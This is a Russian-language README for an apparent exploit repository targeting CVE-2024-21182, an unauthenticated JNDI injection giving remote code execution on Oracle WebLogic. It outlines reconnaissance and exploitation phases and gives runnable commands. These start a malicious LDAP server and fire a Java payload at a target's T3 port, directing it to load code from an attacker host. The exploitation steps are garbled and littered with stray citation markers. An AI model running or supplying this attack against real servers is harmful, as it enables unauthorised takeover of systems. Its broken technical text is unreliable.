
Эксплойт (proof-of-concept) для CVE-2024-21182 — неаутентифицированная JNDI-инъекция, приводящая к удаленному выполнению кода на Oracle WebLogic Server через протоколы T3/IIOP. Включает Docker-лабораторию для тестирования.
CVE-2024-21182 - Инъекция JNDI в Oracle WebLogic Server → RCE
CVE-2024-21182 — это неаутентифицированная уязвимость внедрения JNDI, которая затрагивает компонент Core Oracle WebLogic Server. Она позволяет удаленному злоумышленнику через протоколы T3 или IIOP выполнить произвольный код (RCE) на сервере, получив полный доступ ко всем данным сервера[citation:5][citation:8][citation:9].
Этот репозиторий содержит функциональный Proof of Concept (PoC), демонстрирующий успешную эксплуатацию обход патча CVE-2023-21839 с помощью цепочки гаджетов AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].
| Атрибут | Значение |
|---|---|
| CVE | CVE-2024-21182 |
| Продукт | Oracle WebLogic Server (Core) |
| Затронутые версии | 12.2.1.4.0 и 14.1.1.0.0[citation:7] |
| Доступный патч | Oracle Critical Patch Update (Июль 2024 и Октябрь 2024)[citation:6] |
| Статус в CISA KEV | Активная эксплуатация подтверждена (добавлено 01.06.2026)[citation:3][citation:8] |
| Крайний срок смягчения (CISA) | 04.06.2026[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Фаза 1: Разведка: Определение серверов WebLogic с открытыми портами T3/IIOP (7001).
Фаза 2: Анализ: Определение, работает ли на сервере уязвимая версия (12.2.1.4.0 или 14.1.1.0.0) или отсутствует патч от октября 2024.
Фаза 3: Эксплуатация (технический процесс):
AggregatableOpaqueReference[citation:2].referent предыдущего объекта, чтобы оно указывало на вредоносный MessageDestinationReference[citation:4].wlthint3client.jar (можно извлечь из установки WebLogic).# 1. Клонировать репозиторий
git clone https://github.com/твой-пользователь/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Запустить лабораторию (жертва + атакующий)
docker-compose up -d
# 3. Выполнить автоматическую эксплуатацию
./validate.sh
# 1. Запустить вредоносный LDAP/HTTP сервер
python3 exploit/ldap_server.py
# 2. В другом терминале выполнить Java-пейлоад
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
Текущий статус по CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Но обычно да, RCE в промежуточном ПО являются начальным вектором в атаках с использованием программ-вымогателей).
Этот код предназначен исключительно для образовательных и исследовательских целей. Неправомерное использование данного PoC против систем без явного разрешения незаконно. Автор не несет ответственности за неправомерное использование этой информации.